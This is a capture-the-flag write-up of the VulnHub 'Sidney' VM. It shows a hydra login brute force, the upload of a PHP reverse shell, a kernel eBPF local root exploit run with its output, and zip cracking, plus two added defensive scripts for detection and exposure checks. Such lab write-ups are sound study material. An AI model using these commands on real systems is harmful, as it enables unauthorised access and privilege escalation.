30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Sidney: 0.2

Location

https://www.vulnhub.com

Description

Welcome to my third boot2root / CTF; this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it’s never where they normally live… B-)
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56
Some hints for you:
If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502
The flag is audio as well as visual

Enumeration

(screenshot: nmap output)
Looks like port 80 is the only port that’s open. The page is filled with some text and a picture.
So…. Back for more are you….? Give Ben Daglish a call. I’m sure he’s know the login B-)
Commodore 64 Still ready
(screenshot: the picture on the page)
Nothing in the source code. So let’s check the picture first with exiftool, but there is nothing there either. There are a few things on the site that can be interpreted as a hint. Let’s start with ‘Ben Daglish’. He is a songwriter with numerous songs under his belt. I made a wordlist with all his songs and ran it through dirbuster, but to no avail. Because the wordlist didn’t work, I used dirbuster in brute-force mode.
(screenshot: dirbuster output)
There is a /commodore64/ directory.
(screenshot: the /commodore64/ page)
In the source code there is a comment:
<!-- added by robhubbard password is the C=64 sound chip lowercase -->
<!-- 3letters4digits no space... Instead, show user a proper micro -->
According to Wikipedia, Rob Hubbard is a British composer best known for composing computer game theme music, especially for 1980s microcomputers such as the Commodore 64. Well, isn’t this a coincidence. From the wiki page about Rob Hubbard I was redirected to https://en.m.wikipedia.org/wiki/MOS_Technology_SID (just like the hint said).
Using the newly found directory as the base, I ran dirb to enumerate some more.
(screenshot: dirb output)
There are a lot of hits. First try is /index.php. This leads to the login page.
(screenshot: phpfm login page)
The previous comment contains a few hints that can help with logging in to the system. It said the password was added by robhubbard, so that is probably the username. As for the password, it is composed of the C=64 sound chip name in lowercase, 3 letters and 4 digits with no space. The wiki page mentioned that the C64 sound chip (MOS Technology, 3 letters) came in several models named like ‘6581 R1’ (4 digits). So the password is probably something like mos6581. Because there are 10^4 possibilities, I used crunch to create a list.

crunch 7 7 -t mos%%%% -o passwords.txt

Now it’s time to use this list with hydra. For hydra to work I need some additional information.
(screenshot: the login form fields)

hydra 192.168.56.2 -l robhubbard -P passwords.txt -v -t 10 -w 30 http-form-post "/commodore64/index.php:input_username=^USER^&input_password=^PASS^:Log in"

(screenshot: hydra output)
(screenshot: login)
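The hydra run above is loud from the server’s side: every guess is a POST to the same login path from the same client in a short time. The following is an added example (my own code, not part of the original write-up) showing how a defender would spot that pattern in Apache combined-format access logs: it parses each line, counts POSTs to the login path per client inside a sliding time window, and flags clients at or above a threshold. The log lines, the client addresses and the threshold of 10 attempts in 60 seconds are constructed for illustration; the path /commodore64/index.php is the one from the write-up.

```python
"""Flag web-form login brute forcing in Apache combined-format access logs.

Added example, not code from the original write-up. The log lines below are
constructed; the login path is the one the write-up attacks.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/commodore64/index.php"

# One record of the Apache "combined" format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore any query string
    return rec


def find_login_bruteforce(lines, login_path=LOGIN_PATH, threshold=10, window_seconds=60):
    """Return {ip: max POSTs to login_path in any window} for clients at or above threshold.

    A failed login on this form just returns the form page again, so the status
    code is not a reliable failure signal (hydra itself matches the 'Log in'
    string rather than a code); the detection therefore counts POSTs per client.
    """
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            attempts[rec["ip"]].append(rec["ts"])

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def constructed_sample_log():
    """Constructed log: 12 POSTs in 22 s from one client, plus ordinary traffic."""
    lines = [
        '10.0.0.5 - - [30/Mar/2023:10:00:00 +0000] "GET /commodore64/index.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
        '10.0.0.5 - - [30/Mar/2023:10:00:09 +0000] "POST /commodore64/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    ]
    for i in range(12):
        lines.append(
            f'192.168.56.1 - - [30/Mar/2023:10:00:{2 * i:02d} +0000] '
            f'"POST /commodore64/index.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"'
        )
    lines.append('192.168.56.1 - - [30/Mar/2023:10:05:00 +0000] "GET /commodore64/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    lines.append("not a log line")  # malformed input is skipped, not fatal
    return lines


if __name__ == "__main__":
    for ip, n in find_login_bruteforce(constructed_sample_log()).items():
        print(f"{ip}: {n} POSTs to {LOGIN_PATH} within 60 s")
```

Running the script against the constructed sample flags 192.168.56.1 with 12 attempts and leaves the single POST from 10.0.0.5 alone; on a real host you would feed it the access log for the virtual host that serves the file manager.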
After viewing all options I decided to upload the php-reverse-shell from pentestmonkey and run it.
(screenshot: reverse shell)
And I’m in. Time to enumerate the system.

$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
$ uname -a
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Privilege Escalation

Checking exploit-db, there is a local root exploit (https://www.exploit-db.com/exploits/39772/). According to the description:
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, …), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
An exploit that puts all this together is in exploit.tar
After downloading the archive locally, I used the PHP file manager to upload it to the target.
(screenshot: exploit upload)

$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell…
we have root privs now…
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
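The description quoted above names two preconditions for this escalation: a kernel at 4.4 or later built with CONFIG_BPF_SYSCALL, and kernel.unprivileged_bpf_disabled not set to 1. The following is an added example (mine, not from the write-up or from the exploit archive) that turns those two conditions into a check a defender can run on a host: it reads the sysctl, parses the kernel release string as printed by uname -r, and reports whether the stated preconditions hold. The sysctl path is the real one; treating the value 2 (a later kernel addition meaning disabled but re-enableable by root) as mitigated is my own extension beyond the quoted text.

```python
"""Report whether a host meets the eBPF exploit preconditions quoted above.

Added example; not part of the write-up or the exploit archive. Conditions
checked: kernel >= 4.4 (the description's "Linux >=4.4") and
kernel.unprivileged_bpf_disabled not set to 1.
"""
import platform
import re
from pathlib import Path

SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"


def classify_unprivileged_bpf(value):
    """Map the sysctl's contents to (verdict, explanation)."""
    v = value.strip()
    if v == "0":
        return "exposed", "unprivileged processes may call bpf() to load eBPF programs"
    if v == "1":
        return "mitigated", "unprivileged bpf() disabled; cannot be re-enabled without a reboot"
    if v == "2":
        # Value 2 is a later kernel addition not covered by the quoted description:
        # disabled, but root may set it back to 0. Treated as mitigated here.
        return "mitigated", "unprivileged bpf() disabled, re-enableable by root"
    return "unknown", f"unexpected sysctl value {v!r}"


def kernel_version_tuple(release):
    """'4.4.0-21-generic' -> (4, 4, 0); the patch level defaults to 0 if absent."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def meets_description_preconditions(release, sysctl_value):
    """True when both conditions named in the exploit-db description hold."""
    new_enough = kernel_version_tuple(release) >= (4, 4)
    bpf_open = classify_unprivileged_bpf(sysctl_value)[0] == "exposed"
    return new_enough and bpf_open


def check_host(sysctl_path=SYSCTL_PATH, release=None):
    """Read the live sysctl and kernel release; return (verdict, explanation).

    A missing sysctl file means the kernel was built without CONFIG_BPF_SYSCALL
    or predates the knob, so the bpf() precondition cannot be met.
    """
    release = release or platform.release()
    try:
        value = Path(sysctl_path).read_text()
    except FileNotFoundError:
        return "not-applicable", "sysctl absent: bpf() not built in or kernel predates the knob"
    except PermissionError:
        return "unknown", "sysctl present but unreadable"
    verdict, why = classify_unprivileged_bpf(value)
    if verdict == "exposed" and kernel_version_tuple(release) < (4, 4):
        return "not-applicable", f"kernel {release} predates the 4.4 requirement in the description"
    return verdict, f"kernel {release}: {why}"


if __name__ == "__main__":
    verdict, why = check_host()
    print(f"{verdict}: {why}")
```

On the Sidney box the check would report 4.4.0-21-generic with the sysctl at its default of 0, which is exactly the "exposed" combination the description requires; setting kernel.unprivileged_bpf_disabled=1 (via sysctl or /etc/sysctl.d) removes the precondition without patching the kernel, which is why the check reads the sysctl rather than the version alone.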

Getting the Flag

cd /root
ls
hint.gif

A hint is always welcome.

cp hint.gif /var/www/html/commodore64/

After copying the file, I used the file manager to download it.
(screenshot: hint.gif)
OK... not really sure if this is helpful. Back to the remote system.

ls -aRl /root
/root:
total 84
drwx------ 3 root root 4096 May 25 18:40 .
drwxr-xr-x 23 root root 4096 May 31 20:39 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
dr-------- 3 root root 4096 May 24 21:02 .commodore64
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-rw-r-- 1 rhubbard rhubbard 62464 May 24 21:27 hint.gif
/root/.commodore64:
total 12
dr-------- 3 root root 4096 May 24 21:02 .
drwx------ 3 root root 4096 May 25 18:40 ..
dr-------- 3 root root 4096 May 24 21:01 .miami
/root/.commodore64/.miami:
total 12
dr-------- 3 root root 4096 May 24 21:01 .
dr-------- 3 root root 4096 May 24 21:02 ..
dr-------- 2 root root 4096 May 25 18:40 vice
/root/.commodore64/.miami/vice:
total 12
dr-------- 2 root root 4096 May 25 18:40 .
dr-------- 3 root root 4096 May 24 21:01 ..
-r-------- 1 rhubbard rhubbard 4089 May 24 20:59 flag.zip
-r-------- 1 root root 0 May 24 21:02 versatile_commodore_emulator

Like the hint.gif file, I downloaded the flag.zip to my local system with the file manager.
(screenshot: flag.zip download)
I tried to crack the zip with fcrackzip, but I noticed that the zip file hadn’t made it through intact. Checking the permissions, I noticed that flag.zip was 400 while the rest of the files were 644. After changing the permissions of flag.zip, the file downloaded perfectly. Now for fcrackzip again.

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt flag.zip

(screenshot: fcrackzip output)

unzip flag.zip
Archive: flag.zip
[flag.zip] flag.d64 password:
inflating: flag.d64

A d64 extension. In the directory where flag.zip came from there was also versatile_commodore_emulator. A quick Google search shows that this file could be a Commodore 64 disk image and that VICE (the Versatile Commodore Emulator) is the best tool for running it.
After a few tries VICE still wasn’t running properly, and according to some forums it needs some work to set up. Because this challenge had already taken enough time, I finished it the easy way: with strings.

strings flag.d64
SCREEN 1 --
“““““““““““““““““““
“““““““““““““““““
}CONGRATULATIONS! }
}
“““““““““““““““““
“““““““““““““““““““
TI
(60
0: G
TI
+r.81&4B7
\pbLh
%%%%%%%%%%%%%%%%%%%%%%%%)##
%%%%%%%%#)#
}
}WELL DONE ONCE MORE ON GETTING THE}
}FLAG --VULNHUB'S FIRST C=64 ONE-- }
}WHICH I HOPE YOU ENJOYED. }
} }
}SHOUT-OUTS TO #VULNHUB & A S
} }
} }
}iuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiu}
}jkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjk}
} }
PSID
Warhawk
Rob Hubbard
1986 Firebird
H)xJJJ
JJJJ
OP0
*,=GQ[oz
%%%%%%%%%%%%%%%%##)
%%%%%%
&&&&&&
"""
,,,,,
-----
…..
7?C?O
PECIAL}
}THANKS GOES TO GKNSB & RASTA
MOUSE}
}FOR TESTING & G0TMI1K FOR HOSTING.}
} }
}COMMODORE 64 – STILL READY }
} --KNIGHTMA
VULNHUB
01 2A
FLAG
WARHAWK.SID
qqqqqqqqqqqqqqqq
q q
qqqqqqqqqqqqqqqq

Fun challenge overall.